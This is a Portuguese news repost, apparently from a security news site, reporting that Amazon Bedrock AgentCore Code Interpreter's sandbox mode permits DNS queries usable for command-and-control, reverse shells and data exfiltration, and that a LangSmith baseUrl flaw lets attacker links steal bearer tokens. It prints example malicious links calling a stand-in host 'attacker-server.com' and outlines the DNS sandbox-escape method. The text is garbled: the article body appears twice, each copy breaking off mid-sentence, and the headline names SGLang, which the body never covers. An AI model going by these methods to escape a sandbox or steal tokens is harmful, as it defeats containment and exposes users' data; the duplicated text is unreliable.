📰 Informação fresquinha chegando para você!
Não deixe essa passar: clique e saiba tudo!
Apoie esse projeto de divulgacao de noticias! Clique aqui
Pesquisadores de segurança cibernética divulgaram detalhes de um novo método para exfiltrar dados confidenciais de ambientes de execução de código de inteligência artificial (IA) usando consultas de sistema de nomes de domínio (DNS).
Em um relatório publicado na segunda-feira, BeyondTrust revelou que o modo sandbox do Amazon Bedrock AgentCore Code Interpreter permite consultas DNS de saída que um invasor pode explorar para habilitar shells interativos e contornar o isolamento da rede. O problema, que não possui identificador CVE, possui pontuação CVSS de 7,5 em 10,0.
O Amazon Bedrock AgentCore Code Interpreter é um serviço totalmente gerenciado que permite que agentes de IA executem código com segurança em ambientes de sandbox isolados, de modo que cargas de trabalho de agente não possam acessar sistemas externos. Foi lançado pela Amazon em agosto de 2025.
O fato de o serviço permitir consultas DNS apesar da configuração “sem acesso à rede” pode permitir que “atores de ameaças estabeleçam canais de comando e controle e exfiltração de dados sobre DNS em certos cenários, ignorando os controles de isolamento de rede esperados”, disse Kinnaird McQuade, arquiteto-chefe de segurança da BeyondTrust.
Em um cenário de ataque experimental, um agente de ameaça pode abusar desse comportamento para configurar um canal de comunicação bidirecional usando consultas e respostas DNS, obter um shell reverso interativo, exfiltrar informações confidenciais por meio de consultas DNS se sua função IAM tiver permissões para acessar recursos da AWS, como buckets S3 que armazenam esses dados, e executar a execução de comandos.
Além do mais, o mecanismo de comunicação DNS pode ser abusado para entregar cargas adicionais que são alimentadas ao interpretador de código, fazendo com que ele pesquise o servidor DNS de comando e controle (C2) em busca de comandos armazenados em registros DNS A, execute-os e retorne os resultados por meio de consultas de subdomínio DNS.
É importante notar que o Code Interpreter requer uma função IAM para acessar os recursos da AWS. No entanto, um simples descuido pode fazer com que uma função superprivilegiada seja atribuída ao serviço, concedendo-lhe amplas permissões para acessar dados confidenciais.
“Esta pesquisa demonstra como a resolução de DNS pode minar as garantias de isolamento de rede dos intérpretes de código em sandbox”, disse BeyondTrust. “Ao usar esse método, os invasores podem ter exfiltrado dados confidenciais de recursos da AWS acessíveis por meio da função IAM do intérprete de código, potencialmente causando tempo de inatividade, violações de dados de informações confidenciais do cliente ou infraestrutura excluída.”
Após a divulgação responsável em setembro de 2025, a Amazon determinou que se tratava de uma funcionalidade pretendida e não de um defeito, instando os clientes a usar o modo VPC em vez do modo sandbox para isolamento completo da rede. A gigante da tecnologia também recomenda o uso de um firewall DNS para filtrar o tráfego DNS de saída.
“Para proteger cargas de trabalho confidenciais, os administradores devem inventariar todas as instâncias ativas do AgentCore Code Interpreter e migrar imediatamente aquelas que lidam com dados críticos do modo Sandbox para o modo VPC”, disse Jason Soroko, membro sênior da Sectigo.
"Operar dentro de uma VPC fornece a infraestrutura necessária para um isolamento de rede robusto, permitindo que as equipes implementem grupos de segurança rígidos, ACLs de rede e firewalls DNS do Route53 Resolver para monitorar e bloquear a resolução DNS não autorizada. Por fim, as equipes de segurança devem auditar rigorosamente as funções IAM anexadas a esses intérpretes, aplicando estritamente o princípio do menor privilégio para restringir o raio de explosão de qualquer comprometimento potencial."
LangSmith suscetível a falha de controle de conta
A divulgação ocorre no momento em que a Miggo Security divulga uma falha de segurança de alta gravidade no LangSmith (CVE-2026-25750, pontuação CVSS: 8,5) que expôs os usuários a potencial roubo de tokens e controle de contas. O problema, que afeta implantações auto-hospedadas e em nuvem, foi resolvido na versão 0.12.71 do LangSmith lançada em dezembro de 2025.
A deficiência foi caracterizada como um caso de injeção de parâmetro de URL decorrente de uma falta de validação no parâmetro baseUrl, permitindo que um invasor roube o token de portador, o ID do usuário e o ID do espaço de trabalho de um usuário conectado transmitido a um servidor sob seu controle por meio de técnicas de engenharia social, como enganar a vítima para que ela clique em um link especialmente criado, como abaixo -
Nuvem - smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
Auto-hospedado -/studio/?baseUrl=https://attacker-server.com
A exploração bem-sucedida da vulnerabilidade pode permitir que um invasor obtenha acesso não autorizado ao histórico de rastreamento da IA, bem como exponha consultas SQL internas, registros de clientes de CRM ou código-fonte proprietário, revisando chamadas de ferramentas.
“Um usuário logado do LangSmith pode ser comprometido simplesmente acessando um site controlado por um invasor ou clicando em um link malicioso”, disseram os pesquisadores da Miggo, Liad Eliyahu e Eliana Vuijsje.
“Esta vulnerabilidade é um lembrete de que a observabilidade da IA
Em um relatório publicado na segunda-feira, BeyondTrust revelou que o modo sandbox do Amazon Bedrock AgentCore Code Interpreter permite consultas DNS de saída que um invasor pode explorar para habilitar shells interativos e contornar o isolamento da rede. O problema, que não possui identificador CVE, possui pontuação CVSS de 7,5 em 10,0.
O Amazon Bedrock AgentCore Code Interpreter é um serviço totalmente gerenciado que permite que agentes de IA executem código com segurança em ambientes de sandbox isolados, de modo que cargas de trabalho de agente não possam acessar sistemas externos. Foi lançado pela Amazon em agosto de 2025.
O fato de o serviço permitir consultas DNS apesar da configuração “sem acesso à rede” pode permitir que “atores de ameaças estabeleçam canais de comando e controle e exfiltração de dados sobre DNS em certos cenários, ignorando os controles de isolamento de rede esperados”, disse Kinnaird McQuade, arquiteto-chefe de segurança da BeyondTrust.
Em um cenário de ataque experimental, um agente de ameaça pode abusar desse comportamento para configurar um canal de comunicação bidirecional usando consultas e respostas DNS, obter um shell reverso interativo, exfiltrar informações confidenciais por meio de consultas DNS se sua função IAM tiver permissões para acessar recursos da AWS, como buckets S3 que armazenam esses dados, e executar a execução de comandos.
Além do mais, o mecanismo de comunicação DNS pode ser abusado para entregar cargas adicionais que são alimentadas ao interpretador de código, fazendo com que ele pesquise o servidor DNS de comando e controle (C2) em busca de comandos armazenados em registros DNS A, execute-os e retorne os resultados por meio de consultas de subdomínio DNS.
É importante notar que o Code Interpreter requer uma função IAM para acessar os recursos da AWS. No entanto, um simples descuido pode fazer com que uma função superprivilegiada seja atribuída ao serviço, concedendo-lhe amplas permissões para acessar dados confidenciais.
“Esta pesquisa demonstra como a resolução de DNS pode minar as garantias de isolamento de rede dos intérpretes de código em sandbox”, disse BeyondTrust. “Ao usar esse método, os invasores podem ter exfiltrado dados confidenciais de recursos da AWS acessíveis por meio da função IAM do intérprete de código, potencialmente causando tempo de inatividade, violações de dados de informações confidenciais do cliente ou infraestrutura excluída.”
Após a divulgação responsável em setembro de 2025, a Amazon determinou que se tratava de uma funcionalidade pretendida e não de um defeito, instando os clientes a usar o modo VPC em vez do modo sandbox para isolamento completo da rede. A gigante da tecnologia também recomenda o uso de um firewall DNS para filtrar o tráfego DNS de saída.
“Para proteger cargas de trabalho confidenciais, os administradores devem inventariar todas as instâncias ativas do AgentCore Code Interpreter e migrar imediatamente aquelas que lidam com dados críticos do modo Sandbox para o modo VPC”, disse Jason Soroko, membro sênior da Sectigo.
"Operar dentro de uma VPC fornece a infraestrutura necessária para um isolamento de rede robusto, permitindo que as equipes implementem grupos de segurança rígidos, ACLs de rede e firewalls DNS do Route53 Resolver para monitorar e bloquear a resolução DNS não autorizada. Por fim, as equipes de segurança devem auditar rigorosamente as funções IAM anexadas a esses intérpretes, aplicando estritamente o princípio do menor privilégio para restringir o raio de explosão de qualquer comprometimento potencial."
LangSmith suscetível a falha de controle de conta
A divulgação ocorre no momento em que a Miggo Security divulga uma falha de segurança de alta gravidade no LangSmith (CVE-2026-25750, pontuação CVSS: 8,5) que expôs os usuários a potencial roubo de tokens e controle de contas. O problema, que afeta implantações auto-hospedadas e em nuvem, foi resolvido na versão 0.12.71 do LangSmith lançada em dezembro de 2025.
A deficiência foi caracterizada como um caso de injeção de parâmetro de URL decorrente de uma falta de validação no parâmetro baseUrl, permitindo que um invasor roube o token de portador, o ID do usuário e o ID do espaço de trabalho de um usuário conectado transmitido a um servidor sob seu controle por meio de técnicas de engenharia social, como enganar a vítima para que ela clique em um link especialmente criado, como abaixo -
Nuvem - smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
Auto-hospedado -
A exploração bem-sucedida da vulnerabilidade pode permitir que um invasor obtenha acesso não autorizado ao histórico de rastreamento da IA, bem como exponha consultas SQL internas, registros de clientes de CRM ou código-fonte proprietário, revisando chamadas de ferramentas.
“Um usuário logado do LangSmith pode ser comprometido simplesmente acessando um site controlado por um invasor ou clicando em um link malicioso”, disseram os pesquisadores da Miggo, Liad Eliyahu e Eliana Vuijsje.
“Esta vulnerabilidade é um lembrete de que a observabilidade da IA
Fonte: https://thehackernews.com
#samirnews #samir #news #boletimtec #falhas #de #ia #no #amazon #bedrock, #langsmith #e #sglang #permitem #exfiltração #de #dados #e #rce
🚀 Mais conteúdos incríveis estão por vir, fique atento!
Postar um comentário